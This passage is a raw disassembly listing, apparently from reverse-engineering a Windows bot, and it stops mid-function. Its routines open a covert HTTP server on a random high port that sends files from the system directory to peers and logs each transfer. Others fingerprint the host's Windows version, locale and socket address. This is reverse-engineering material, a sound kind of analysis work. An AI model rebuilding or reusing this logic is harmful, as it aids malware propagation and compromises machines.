mov cl, [ebp+var_C]
sub eax, esi
mov esi, [ebp+var_8]
add esi, 2
push 25h
push esi
mov [eax+ebx], cl
mov byte ptr [eax+ebx+1], 0
call sub_403850
test eax, eax
pop ecx
pop ecx
mov [ebp+var_8], eax
jnz loc_41841D
jmp loc_4183D7
; ---------------------------------------------------------------------------
loc_4184AF: ; CODE XREF: sub_418396+DE�j
xor esi, esi
loc_4184B1: ; CODE XREF: sub_418396+82�j
push ebx
call sub_402B9B
pop ecx
pop edi
mov eax, esi
pop esi
pop ebx
leave
retn
sub_418396 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4184BF proc near ; CODE XREF: sub_418552+A1�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov [eax], esi
mov eax, [ebp+arg_4]
push edi
mov [eax], esi
mov eax, [ebp+arg_8]
push offset asc_42049C ; "\r\n"
push esi
mov [ebx], esi
mov [eax], esi
call sub_4037B0
mov edi, eax
test edi, edi
pop ecx
pop ecx
jnz short loc_4184EB
loc_4184E7: ; CODE XREF: sub_4184BF+52�j
; sub_4184BF+69�j ...
xor eax, eax
jmp short loc_41854F
; ---------------------------------------------------------------------------
loc_4184EB: ; CODE XREF: sub_4184BF+26�j
push offset asc_4204A0 ; " "
push esi
mov byte ptr [edi], 0
call sub_403A34
mov ecx, [ebp+arg_0]
push offset asc_4204A4 ; " "
push 0
mov [ecx], eax
call sub_403A34
add esp, 10h
test eax, eax
mov [ebx], eax
jz short loc_4184E7
push offset asc_4204A8 ; " "
push 0
call sub_403A34
test eax, eax
pop ecx
pop ecx
mov ecx, [ebp+arg_4]
mov [ecx], eax
jz short loc_4184E7
mov ecx, [ebp+arg_8]
lea eax, [edi+2]
cmp byte ptr [eax], 0
mov [ecx], eax
jz short loc_41854C
push offset asc_4204AC ; "\r\n\r\n"
push eax
call sub_4037B0
test eax, eax
pop ecx
pop ecx
jz short loc_4184E7
mov byte ptr [eax+2], 0
loc_41854C: ; CODE XREF: sub_4184BF+76�j
xor eax, eax
inc eax
loc_41854F: ; CODE XREF: sub_4184BF+2A�j
pop edi
pop ebp
retn
sub_4184BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=0CA8h
sub_418552 proc near ; CODE XREF: sub_418AEB+28�p
var_D28 = dword ptr -0D28h
var_D24 = dword ptr -0D24h
var_D20 = dword ptr -0D20h
var_D1C = dword ptr -0D1Ch
var_D18 = byte ptr -0D18h
var_D14 = byte ptr -0D14h
var_D13 = byte ptr -0D13h
var_D12 = byte ptr -0D12h
var_D11 = byte ptr -0D11h
var_D08 = byte ptr -0D08h
var_D07 = byte ptr -0D07h
var_908 = byte ptr -908h
var_907 = byte ptr -907h
var_508 = byte ptr -508h
var_507 = byte ptr -507h
var_108 = byte ptr -108h
var_107 = byte ptr -107h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-0CA8h]
sub esp, 0D28h
mov eax, dword_423064
xor eax, ebp
mov [ebp+0CA8h+var_4], eax
push ebx
push esi
mov esi, 3FFh
xor ebx, ebx
push esi
lea eax, [ebp+0CA8h+var_907]
push ebx
push eax
mov [ebp+0CA8h+var_908], bl
call sub_407B70
push esi
lea eax, [ebp+0CA8h+var_507]
push ebx
push eax
mov [ebp+0CA8h+var_508], bl
call sub_407B70
push 103h
lea eax, [ebp+0CA8h+var_107]
push ebx
push eax
mov [ebp+0CA8h+var_108], bl
call sub_407B70
push esi
lea eax, [ebp+0CA8h+var_D07]
push ebx
push eax
mov [ebp+0CA8h+var_D08], bl
call sub_407B70
add esp, 30h
push ebx
push 400h
lea eax, [ebp+0CA8h+var_D08]
push eax
push [ebp+0CA8h+arg_0]
call ds:dword_41D270 ; recv
mov [ebp+eax+0CA8h+var_D08], bl
lea eax, [ebp+0CA8h+var_D1C]
push eax
lea eax, [ebp+0CA8h+var_D20]
push eax
lea eax, [ebp+0CA8h+var_D28]
push eax
lea ebx, [ebp+0CA8h+var_D24]
lea esi, [ebp+0CA8h+var_D08]
call sub_4184BF
add esp, 0Ch
test eax, eax
jz loc_418AD4
mov esi, [ebp+0CA8h+var_D28]
push edi
push 4
mov edi, offset aGet ; "GET"
pop ecx
xor eax, eax
repe cmpsb
jz loc_4186E0
push offset aQue? ; "Que?"
mov esi, 3FFh
lea eax, [ebp+0CA8h+var_908]
push esi
push eax
call sub_402AEE
lea eax, [ebp+0CA8h+var_908]
add esp, 0Ch
lea edx, [eax+1]
loc_41863C: ; CODE XREF: sub_418552+EF�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41863C
sub eax, edx
xor ebx, ebx
mov [ebp+eax+0CA8h+var_908], bl
lea eax, [ebp+0CA8h+var_908]
lea ecx, [eax+1]
loc_418657: ; CODE XREF: sub_418552+10A�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_418657
sub eax, ecx
push eax
push offset aHttp1_1501NotI ; "HTTP/1.1 501 Not Implemented\r\nContent-L"...
lea eax, [ebp+0CA8h+var_508]
push esi
push eax
call sub_402AEE
lea eax, [ebp+0CA8h+var_508]
add esp, 10h
lea ecx, [eax+1]
loc_41867F: ; CODE XREF: sub_418552+132�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_41867F
sub eax, ecx
mov [ebp+eax+0CA8h+var_508], bl
lea eax, [ebp+0CA8h+var_508]
lea ecx, [eax+1]
loc_418698: ; CODE XREF: sub_418552+14B�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_418698
mov esi, ds:dword_41D228
push ebx
sub eax, ecx
push eax
lea eax, [ebp+0CA8h+var_508]
push eax
push [ebp+0CA8h+arg_0]
call esi ; send
lea eax, [ebp+0CA8h+var_908]
lea ecx, [eax+1]
loc_4186C1: ; CODE XREF: sub_418552+174�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_4186C1
push ebx
sub eax, ecx
push eax
lea eax, [ebp+0CA8h+var_908]
push eax
push [ebp+0CA8h+arg_0]
call esi ; send
jmp loc_418AC7
; ---------------------------------------------------------------------------
loc_4186E0: ; CODE XREF: sub_418552+C1�j
mov edi, [ebp+0CA8h+var_D24]
push edi
call sub_418396
test eax, eax
pop ecx
jz loc_418AD3
mov eax, edi
lea edx, [eax+1]
loc_4186F7: ; CODE XREF: sub_418552+1AA�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4186F7
sub eax, edx
cmp eax, 1
jbe loc_418849
inc edi
push 2Fh
push edi
call sub_403850
mov esi, eax
xor ebx, ebx
cmp esi, ebx
pop ecx
pop ecx
jz loc_4187A6
mov [esi], bl
inc esi
push esi
call sub_41837F
push ebx
push esi
call sub_403850
add esp, 0Ch
cmp [esi], bl
jz short loc_41876F
cmp byte ptr [eax-1], 5Ch
jz short loc_41876F
push esi
push edi
push offset dword_4266A8
push offset aSSS_1 ; "%s\\%s\\%s"
lea eax, [ebp+0CA8h+var_108]
push 103h
push eax
call sub_402AEE
lea eax, [ebp+0CA8h+var_108]
add esp, 18h
lea esi, [eax+1]
loc_418766: ; CODE XREF: sub_418552+219�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_418766
jmp short loc_4187D5
; ---------------------------------------------------------------------------
loc_41876F: ; CODE XREF: sub_418552+1E3�j
; sub_418552+1E9�j
push offset dword_4268B8
push esi
push edi
push offset dword_4266A8
push offset aSSSS ; "%s\\%s\\%s%s"
lea eax, [ebp+0CA8h+var_108]
push 103h
push eax
call sub_402AEE
lea eax, [ebp+0CA8h+var_108]
add esp, 1Ch
lea esi, [eax+1]
loc_41879D: ; CODE XREF: sub_418552+250�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41879D
jmp short loc_4187D5
; ---------------------------------------------------------------------------
loc_4187A6: ; CODE XREF: sub_418552+1C8�j
push edi
push offset dword_4266A8
push offset aSS_6 ; "%s\\%s"
lea eax, [ebp+0CA8h+var_108]
push 103h
push eax
call sub_402AEE
lea eax, [ebp+0CA8h+var_108]
add esp, 14h
lea esi, [eax+1]
loc_4187CE: ; CODE XREF: sub_418552+281�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4187CE
loc_4187D5: ; CODE XREF: sub_418552+21B�j
; sub_418552+252�j
sub eax, esi
mov [ebp+eax+0CA8h+var_108], bl
lea eax, [ebp+0CA8h+var_108]
push eax
push offset byte_4267B0
call sub_4028A9
test eax, eax
pop ecx
pop ecx
jz short loc_41884B
mov esi, 200h
push esi
call sub_4036E0
push esi
mov edi, eax
push ebx
push edi
mov [ebp+0CA8h+var_D20], edi
call sub_407B70
add esp, 10h
push offset aQue?_0 ; "Que?"
push edi
call sub_402A45
pop ecx
dec eax
push eax
push edi
call sub_402AEE
mov eax, edi
add esp, 0Ch
lea esi, [eax+1]
loc_41882C: ; CODE XREF: sub_418552+2DF�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41882C
sub eax, esi
mov [eax+edi], bl
mov eax, edi
lea esi, [eax+1]
loc_41883D: ; CODE XREF: sub_418552+2F0�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41883D
jmp loc_41892E
; ---------------------------------------------------------------------------
loc_418849: ; CODE XREF: sub_418552+1B1�j
xor ebx, ebx
loc_41884B: ; CODE XREF: sub_418552+2A1�j
push ebx
push ebx
push 3
push ebx
push 1
push 80000000h
lea eax, [ebp+0CA8h+var_108]
push eax
call ds:dword_41D06C ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+0CA8h+var_D24], esi
jz short loc_4188DF
push ebx
push esi
call ds:dword_41D070 ; GetFileSize
mov edi, eax
push edi
mov [ebp+0CA8h+var_D1C], edi
call sub_4036E0
push edi
push ebx
push eax
mov [ebp+0CA8h+var_D20], eax
call sub_407B70
add esp, 10h
push ebx
push ebx
push ebx
push esi
mov esi, ds:dword_41D074
call esi ; SetFilePointer
push ebx
lea eax, [ebp+0CA8h+var_D28]
push eax
push edi
mov edi, ds:dword_41D078
jmp short loc_4188D1
; ---------------------------------------------------------------------------
loc_4188A9: ; CODE XREF: sub_418552+389�j
cmp [ebp+0CA8h+var_D28], ebx
jnz loc_418933
push [ebp+0CA8h+var_D1C]
push ebx
push [ebp+0CA8h+var_D20]
call sub_407B70
add esp, 0Ch
push ebx
push ebx
push ebx
push [ebp+0CA8h+var_D24]
call esi ; SetFilePointer
push ebx
lea eax, [ebp+0CA8h+var_D28]
push eax
push [ebp+0CA8h+var_D1C]
loc_4188D1: ; CODE XREF: sub_418552+355�j
push [ebp+0CA8h+var_D20]
push [ebp+0CA8h+var_D24]
call edi ; ReadFile
test eax, eax
jnz short loc_4188A9
jmp short loc_418933
; ---------------------------------------------------------------------------
loc_4188DF: ; CODE XREF: sub_418552+31A�j
mov esi, 200h
push esi
call sub_4036E0
push esi
mov edi, eax
push ebx
push edi
mov [ebp+0CA8h+var_D20], edi
call sub_407B70
add esp, 10h
push offset aQue?_1 ; "Que?"
push edi
call sub_402A45
pop ecx
dec eax
push eax
push edi
call sub_402AEE
mov eax, edi
add esp, 0Ch
lea esi, [eax+1]
loc_418916: ; CODE XREF: sub_418552+3C9�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_418916
sub eax, esi
mov [eax+edi], bl
mov eax, edi
lea esi, [eax+1]
loc_418927: ; CODE XREF: sub_418552+3DA�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_418927
loc_41892E: ; CODE XREF: sub_418552+2F2�j
sub eax, esi
mov [ebp+0CA8h+var_D1C], eax
loc_418933: ; CODE XREF: sub_418552+35A�j
; sub_418552+38B�j
push 400h
lea eax, [ebp+0CA8h+var_508]
push ebx
push eax
call sub_407B70
push [ebp+0CA8h+var_D1C]
lea eax, [ebp+0CA8h+var_508]
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 ok\r\nContent-Length: %d\r\nCo"...
push 3FFh
push eax
call sub_402AEE
lea eax, [ebp+0CA8h+var_508]
add esp, 1Ch
lea esi, [eax+1]
loc_41896A: ; CODE XREF: sub_418552+41D�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41896A
sub eax, esi
mov [ebp+eax+0CA8h+var_508], bl
lea eax, [ebp+0CA8h+var_508]
lea esi, [eax+1]
loc_418983: ; CODE XREF: sub_418552+436�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_418983
sub eax, esi
mov esi, ds:dword_41D228
push ebx
push eax
lea eax, [ebp+0CA8h+var_508]
push eax
push [ebp+0CA8h+arg_0]
call esi ; send
test eax, eax
jz loc_418ABE
push ebx
push [ebp+0CA8h+var_D1C]
push [ebp+0CA8h+var_D20]
push [ebp+0CA8h+arg_0]
call esi ; send
test eax, eax
jz loc_418ABE
lea eax, [ebp+0CA8h+var_108]
push eax
push offset byte_4267B0
call sub_4028A9
test eax, eax
pop ecx
pop ecx
jnz loc_418ABE
push 100h
call sub_402648
mov esi, eax
push esi
call sub_402A45
push eax
mov ebx, offset dword_424ED0
call sub_4196D1
xor eax, eax
lea edi, [ebp+0CA8h+var_D18]
stosd
stosd
stosd
add esp, 0Ch
stosd
lea eax, [ebp+0CA8h+var_D24]
push eax
lea eax, [ebp+0CA8h+var_D18]
push eax
push [ebp+0CA8h+arg_0]
mov [ebp+0CA8h+var_D24], 10h
call ds:dword_41D248 ; getpeername
movzx eax, [ebp+0CA8h+var_D11]
movzx ecx, [ebp+0CA8h+var_D12]
shl eax, 8
add eax, ecx
movzx ecx, [ebp+0CA8h+var_D13]
shl eax, 8
add eax, ecx
movzx ecx, [ebp+0CA8h+var_D14]
shl eax, 8
add eax, ecx
push 2
mov [ebp+0CA8h+var_D1C], eax
push 4
lea eax, [ebp+0CA8h+var_D1C]
push eax
call ds:dword_41D280 ; gethostbyaddr
test eax, eax
push dword_433940
jnz short loc_418A86
movzx eax, [ebp+0CA8h+var_D11]
push eax
movzx eax, [ebp+0CA8h+var_D12]
push eax
movzx eax, [ebp+0CA8h+var_D13]
push eax
movzx eax, [ebp+0CA8h+var_D14]
push eax
push offset aHttpTransferD_ ; "HTTP: Transfer: %d.%d.%d.%d (N/A). %d T"...
push esi
push 0
push offset dword_4269BC
call sub_417361
add esp, 24h
jmp short loc_418AB1
; ---------------------------------------------------------------------------
loc_418A86: ; CODE XREF: sub_418552+507�j
push dword ptr [eax]
movzx eax, [ebp+0CA8h+var_D11]
push eax
movzx eax, [ebp+0CA8h+var_D12]
push eax
movzx eax, [ebp+0CA8h+var_D13]
push eax
movzx eax, [ebp+0CA8h+var_D14]
push eax
push offset aHttpTransfer_0 ; "HTTP: Transfer: %d.%d.%d.%d (%s). %d To"...
push esi
push 0
push offset dword_4269BC
call sub_417361
add esp, 28h
loc_418AB1: ; CODE XREF: sub_418552+532�j
inc dword_433940
push esi
call sub_402B9B
pop ecx
loc_418ABE: ; CODE XREF: sub_418552+453�j
; sub_418552+46A�j ...
push [ebp+0CA8h+var_D20]
call sub_403603
pop ecx
loc_418AC7: ; CODE XREF: sub_418552+189�j
push [ebp+0CA8h+arg_0]
call ds:dword_41D224 ; closesocket
loc_418AD3: ; CODE XREF: sub_418552+19A�j
pop edi
loc_418AD4: ; CODE XREF: sub_418552+AB�j
mov ecx, [ebp+0CA8h+var_4]
pop esi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 0CA8h
leave
retn
sub_418552 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418AEB proc near ; DATA XREF: sub_418C40+27�o
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 401h
jz short loc_418AFE
pop ebp
jmp ds:dword_41D200
; ---------------------------------------------------------------------------
loc_418AFE: ; CODE XREF: sub_418AEB+A�j
mov eax, [ebp+arg_C]
dec eax
jz short loc_418B10
sub eax, 7
jnz short loc_418B19
call sub_41835D
jmp short loc_418B19
; ---------------------------------------------------------------------------
loc_418B10: ; CODE XREF: sub_418AEB+17�j
push [ebp+arg_8]
call sub_418552
pop ecx
loc_418B19: ; CODE XREF: sub_418AEB+1C�j
; sub_418AEB+23�j
xor eax, eax
pop ebp
retn 10h
sub_418AEB endp
; =============== S U B R O U T I N E =======================================
sub_418B1F proc near ; CODE XREF: sub_418C40+9B�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, 104h
push edi
xor ebp, ebp
push ebp
mov ebx, offset dword_4266A8
push ebx
call sub_407B70
push edi
push ebp
mov esi, offset dword_4268B8
push esi
call sub_407B70
push edi
push ebp
mov ebp, offset byte_4267B0
push ebp
call sub_407B70
add esp, 24h
push edi
push ebx
call ds:dword_41D0F4 ; GetSystemDirectoryA
push edi
mov ebx, offset byte_425061
call sub_4196D1
push esi
push offset dword_4266A8
push offset aSS_7 ; "%s\\%s"
push 103h
push ebp
call sub_402AEE
mov eax, ebp
add esp, 18h
lea ecx, [eax+1]
loc_418B85: ; CODE XREF: sub_418B1F+6B�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_418B85
push 0
push 1
sub eax, ecx
push 2
mov byte_4267B0[eax], dl
call ds:dword_41D27C ; socket
cmp eax, 0FFFFFFFFh
mov dword_4267AC, eax
jnz short loc_418BB8
push eax
loc_418BAB: ; CODE XREF: sub_418B1F+E7�j
call ds:dword_41D224 ; closesocket
xor eax, eax
jmp loc_418C3B
; ---------------------------------------------------------------------------
loc_418BB8: ; CODE XREF: sub_418B1F+89�j
mov eax, 0FFDCh
mov ebx, 3E8h
call sub_4192C7
push eax
mov dword_426594, eax
mov word_426694, 2
call ds:dword_41D278 ; htons
and dword_426698, 0
push 10h
push offset word_426694
push dword_4267AC
mov word_426696, ax
call ds:dword_41D26C ; bind
test eax, eax
jz short loc_418C08
loc_418C00: ; CODE XREF: sub_418B1F+102�j
; sub_418B1F+114�j
push dword_4267AC
jmp short loc_418BAB
; ---------------------------------------------------------------------------
loc_418C08: ; CODE XREF: sub_418B1F+DF�j
push 9
push 401h
push [esp+18h+arg_0]
push dword_4267AC
call ds:dword_41D22C ; WSAAsyncSelect
test eax, eax
jnz short loc_418C00
push 4
push dword_4267AC
call ds:dword_41D230 ; listen
test eax, eax
jnz short loc_418C00
inc eax
mov byte_4268B4, al
loc_418C3B: ; CODE XREF: sub_418B1F+94�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_418B1F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418C40 proc near ; DATA XREF: sub_418D17+21�o
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 50h
mov eax, dword_4266A4
push ebx
mov ebx, ds:dword_41D1F4
push esi
push edi
mov edi, 7F00h
push edi
xor esi, esi
push esi
mov [ebp+var_3C], eax
mov [ebp+var_28], offset dword_4255BC
mov [ebp+var_48], offset sub_418AEB
mov [ebp+var_4C], 8
mov [ebp+var_50], 30h
call ebx ; LoadIconA
push edi
push esi
mov [ebp+var_38], eax
call ebx ; LoadIconA
push edi
push esi
mov [ebp+var_24], eax
call ds:dword_41D20C ; LoadCursorA
mov [ebp+var_34], eax
lea eax, [ebp+var_50]
push eax
mov [ebp+var_2C], esi
mov [ebp+var_44], esi
mov [ebp+var_40], esi
mov [ebp+var_30], 1
call ds:dword_41D1F0 ; RegisterClassExA
test ax, ax
jz short loc_418D0E
push esi
push dword_4266A4
mov eax, 80000000h
push esi
push esi
push esi
push esi
push eax
push eax
push 0CF0000h
push offset asc_420364 ; " "
push offset dword_4255BC
push esi
call ds:dword_41D1FC ; CreateWindowExA
push eax
call sub_418B1F
test eax, eax
pop ecx
jz short loc_418D0E
mov edi, ds:dword_41D208
jmp short loc_418D01
; ---------------------------------------------------------------------------
loc_418CED: ; CODE XREF: sub_418C40+CC�j
lea eax, [ebp+var_20]
push eax
call ds:dword_41D1F8 ; TranslateMessage
lea eax, [ebp+var_20]
push eax
call ds:dword_41D204 ; DispatchMessageA
loc_418D01: ; CODE XREF: sub_418C40+AB�j
push esi
push esi
push esi
lea eax, [ebp+var_20]
push eax
call edi ; GetMessageA
test eax, eax
jnz short loc_418CED
loc_418D0E: ; CODE XREF: sub_418C40+70�j
; sub_418C40+A3�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_418C40 endp
; =============== S U B R O U T I N E =======================================
sub_418D17 proc near ; CODE XREF: sub_401F1C+70�p
; .text:0041BFC8�p
push 4
mov eax, offset loc_41C299
call sub_4045CC
push 8
call sub_40304B
mov esi, eax
pop ecx
mov [ebp-10h], esi
and dword ptr [ebp-4], 0
test esi, esi
jz short loc_418D4B
push offset sub_418C40
xor ecx, ecx
mov edi, offset aHs ; "HS"
call sub_4140AB
jmp short loc_418D4D
; ---------------------------------------------------------------------------
loc_418D4B: ; CODE XREF: sub_418D17+1F�j
xor eax, eax
loc_418D4D: ; CODE XREF: sub_418D17+32�j
cmp dword ptr [eax+4], 0
setnz al
call sub_40466B
retn
sub_418D17 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_418D5A proc near ; CODE XREF: sub_4192C7:loc_4192EB�p
mov eax, dword_4265B0
mov edx, dword_4265B4
lea ecx, ds:4265B8h[eax*4]
push esi
mov esi, eax
mov eax, dword_4265B8[edx*4]
add eax, [ecx]
and eax, 3FFFFFFFh
inc esi
cmp esi, 37h
mov [ecx], eax
jnz short loc_418D87
xor esi, esi
loc_418D87: ; CODE XREF: sub_418D5A+29�j
inc edx
cmp edx, 37h
jnz short loc_418D8F
xor edx, edx
loc_418D8F: ; CODE XREF: sub_418D5A+31�j
mov dword_4265B0, esi
mov dword_4265B4, edx
sar eax, 6
pop esi
retn
sub_418D5A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418DA0 proc near ; CODE XREF: sub_401CC0+125�p
; sub_41748B:loc_41759C�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push ebx
lea eax, [ebp+var_10]
push eax
call ds:dword_41D058 ; QueryPerformanceCounter
test eax, eax
jz short loc_418E1C
lea eax, [ebp+var_8]
push eax
call ds:dword_41D064 ; QueryPerformanceFrequency
test eax, eax
jz short loc_418E1C
push [ebp+var_4]
push [ebp+var_8]
push [ebp+var_C]
push [ebp+var_10]
call sub_41C070
push 0
push 15180h
push edx
push eax
call sub_411800
push 0
push 0E10h
push ebx
push ecx
mov dword_426598, eax
mov dword_42659C, edx
call sub_411800
push 0
push 3Ch
push ebx
push ecx
mov dword_4265A0, eax
mov dword_4265A4, edx
call sub_41C070
mov dword_4265A8, eax
mov dword_4265AC, edx
loc_418E1C: ; CODE XREF: sub_418DA0+13�j
; sub_418DA0+21�j
pop ebx
leave
retn
sub_418DA0 endp
; =============== S U B R O U T I N E =======================================
sub_418E1F proc near ; CODE XREF: sub_401CC0+EF�p
; sub_41748B+BC�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push [esp+arg_0]
push 0
push esi
call sub_407B70
add esp, 0Ch
cmp [esp+arg_4], 0
push [esp+arg_0]
push esi
jz short loc_418E41
push 1002h
jmp short loc_418E43
; ---------------------------------------------------------------------------
loc_418E41: ; CODE XREF: sub_418E1F+19�j
push 7
loc_418E43: ; CODE XREF: sub_418E1F+20�j
push 800h
call ds:dword_41D054 ; GetLocaleInfoA
mov eax, esi
retn
sub_418E1F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_418E51 proc near ; CODE XREF: sub_401CC0+DA�p
; sub_41748B+8B�p ...
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = byte ptr -84h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 98h
mov eax, dword_423064
xor eax, ebp
mov [ebp+74h+var_4], eax
push ebx
push edi
lea eax, [ebp+74h+var_98]
push eax
mov ebx, ecx
mov [ebp+74h+var_98], 94h
call ds:dword_41D068 ; GetVersionExA
push ebx
xor edi, edi
push edi
push esi
call sub_407B70
add esp, 0Ch
cmp [ebp+74h+var_94], 6
jnz short loc_418E9A
cmp [ebp+74h+var_90], edi
jnz short loc_418F05
push offset aVis ; "VIS"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418E9A: ; CODE XREF: sub_418E51+3B�j
cmp [ebp+74h+var_94], 5
jnz short loc_418EC6
cmp [ebp+74h+var_90], 2
jnz short loc_418EAD
push offset a2k3 ; "2K3"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418EAD: ; CODE XREF: sub_418E51+53�j
cmp [ebp+74h+var_90], 1
jnz short loc_418EBA
push offset aXp ; "XP"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418EBA: ; CODE XREF: sub_418E51+60�j
cmp [ebp+74h+var_90], edi
jnz short loc_418F05
push offset a2k ; "2K"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418EC6: ; CODE XREF: sub_418E51+4D�j
cmp [ebp+74h+var_94], 4
jnz short loc_418F05
cmp [ebp+74h+var_90], 5Ah
jnz short loc_418ED9
push offset aMe ; "ME"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418ED9: ; CODE XREF: sub_418E51+7F�j
cmp [ebp+74h+var_90], 1
jnz short loc_418EE6
push offset a98 ; "98"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418EE6: ; CODE XREF: sub_418E51+8C�j
cmp [ebp+74h+var_90], edi
jnz short loc_418F05
cmp [ebp+74h+var_88], 2
jnz short loc_418EF8
push offset aNt ; "NT"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418EF8: ; CODE XREF: sub_418E51+9E�j
cmp [ebp+74h+var_88], 1
jnz short loc_418F17
push offset a95 ; "95"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418F05: ; CODE XREF: sub_418E51+40�j
; sub_418E51+6C�j ...
push offset aUnk ; "UNK"
loc_418F0A: ; CODE XREF: sub_418E51+47�j
; sub_418E51+5A�j ...
lea eax, [ebx-1]
push eax
push esi
call sub_402AEE
add esp, 0Ch
loc_418F17: ; CODE XREF: sub_418E51+AB�j
mov eax, esi
lea edx, [eax+1]
loc_418F1C: ; CODE XREF: sub_418E51+D0�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_418F1C
sub eax, edx
cmp [ebp+74h+arg_0], cl
mov [eax+esi], cl
jz loc_418FB3
push ebx
call sub_402648
mov edi, eax
push edi
call sub_402A45
push eax
push 0
push edi
call sub_407B70
add esp, 14h
push [ebp+74h+var_8C]
lea eax, [ebp+74h+var_84]
push [ebp+74h+var_90]
push [ebp+74h+var_94]
push eax
push esi
push offset aOsMicrosoftWin ; "[OS: Microsoft Windows %s %s (%i.%i bui"...
push edi
call sub_402A45
pop ecx
dec eax
push eax
push edi
call sub_402AEE
mov eax, edi
add esp, 20h
lea ecx, [eax+1]
loc_418F75: ; CODE XREF: sub_418E51+129�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_418F75
push ebx
sub eax, ecx
push 0
push esi
mov [eax+edi], dl
call sub_407B70
push edi
push offset aS_12 ; "%s"
dec ebx
push ebx
push esi
call sub_402AEE
mov eax, esi
add esp, 1Ch
lea ecx, [eax+1]
loc_418FA0: ; CODE XREF: sub_418E51+154�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_418FA0
sub eax, ecx
push edi
mov [eax+esi], dl
call sub_402B9B
pop ecx
loc_418FB3: ; CODE XREF: sub_418E51+DA�j
mov ecx, [ebp+74h+var_4]
pop edi
xor ecx, ebp
mov eax, esi
pop ebx
call sub_402710
add ebp, 74h
leave
retn
sub_418E51 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418FC6 proc near ; CODE XREF: sub_401C1D+50�p
; sub_401CC0+FE�p ...
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_8], eax
push edi
xor eax, eax
lea edi, [ebp+var_18]
stosd
stosd
stosd
stosd
xor eax, eax
mov edi, esi
stosd
stosd
stosd
stosd
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
mov [ebp+var_1C], 10h
call ds:dword_41D238 ; getsockname
movzx eax, [ebp+var_11]
push eax
movzx eax, [ebp+var_12]
push eax
movzx eax, [ebp+var_13]
push eax
movzx eax, [ebp+var_14]
push eax
push offset aD_D_D_D_0 ; "%d.%d.%d.%d"
push 0Fh
push esi
call sub_402AEE
mov eax, esi
add esp, 1Ch
lea ecx, [eax+1]
loc_419029: ; CODE XREF: sub_418FC6+68�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_419029
sub eax, ecx
mov ecx, [ebp+var_8]
mov [eax+esi], dl
xor ecx, ebp
mov eax, esi
pop edi
call sub_402710
leave
retn
sub_418FC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419044 proc near ; CODE XREF: sub_401F1C+10C�p
; sub_417676+A5�p ...
